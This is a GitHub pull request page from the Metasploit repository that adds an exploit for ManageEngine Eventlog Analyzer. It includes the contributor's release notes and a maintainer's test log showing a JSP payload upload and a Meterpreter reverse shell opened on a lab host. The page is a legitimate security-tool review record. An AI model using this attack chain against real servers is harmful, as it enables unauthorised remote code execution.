Skip to content

Add Eventlog Analzyer exploit #3732

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 6 commits into from
Sep 9, 2014
Merged

Add Eventlog Analzyer exploit #3732

merged 6 commits into from
Sep 9, 2014

Conversation

pedrib
Copy link
Contributor

@pedrib pedrib commented Sep 1, 2014

This is yet another exploit for a ManageEngine product, Eventlog Analyzer. h0ng10 had discovered this more than a year ago, but ManageEngine failed to resolve it so he made the discovery public yesterday evening.
Long story short, I found the same bug a couple of months, and had an exploit ready for when ManageEngine fixed it. Since it's public now, I'm releasing the exploit. h0ng10 is credit properly as the original vulnerability discoverer.
This exploit has been very well tested in many Windows and Linux versions of the product, all the way from 7.0 to the latest 9.9 build 9002.

@pedrib
Copy link
Contributor Author

pedrib commented Sep 3, 2014

This final commit I've pushed is really final - I don't expect to make any more changes.

@wchen-r7 wchen-r7 self-assigned this Sep 9, 2014
@wchen-r7
Copy link
Contributor

wchen-r7 commented Sep 9, 2014

Works for me:

msf exploit(eventlog_file_upload) > check
[*] 192.168.1.80:8400 - The target appears to be vulnerable.
msf exploit(eventlog_file_upload) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.80:8400 - Determining target
[*] 192.168.1.80:8400 - Selected target Eventlog Analyzer v8.1 - v9.9 b9002 / Windows
[*] 192.168.1.80:8400 - Uploading payload...
[*] 192.168.1.80:8400 - Payload uploaded successfully
[*] 192.168.1.80:8400 - Executing payload...
[*] Sending stage (769536 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.80:1292) at 2014-09-09 11:03:35 -0500
[+] Deleted ../webapps/event/1d9Io4FqnGh3fIY.jsp
[+] Deleted ../webapps/event/MCVGhF4UjlbBBKgL8ri.jsp

meterpreter >

@wchen-r7 wchen-r7 merged commit ded085f into rapid7:master Sep 9, 2014
wchen-r7 added a commit that referenced this pull request Sep 9, 2014
@pedrib pedrib deleted the eventlog-exploit branch October 18, 2014 10:35
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants